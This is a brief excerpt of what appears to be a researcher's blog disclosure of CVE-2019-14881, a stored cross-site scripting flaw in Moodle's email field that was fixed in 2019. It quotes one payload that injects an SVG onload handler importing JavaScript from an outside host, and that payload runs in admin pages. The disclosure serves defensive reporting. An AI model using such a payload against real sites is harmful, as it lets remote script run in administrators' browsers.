This blogpost is about a Stored Xss vulnerability which I found in Moodle in September, 2019. It was fixed in November 2019 and was assigned CVE-2019-14881. TLDR: If You especially craft a payload ( like “><svg/onload=import(‘https://c2.tadeu.work/a.js’)>”@tadeu.work ) and update your email you can execute javascript in certain pages like “browse users” in the admin area… Continue reading CVE-2019-14881 @ Moodle – Stored-Xss on email reflected on various pages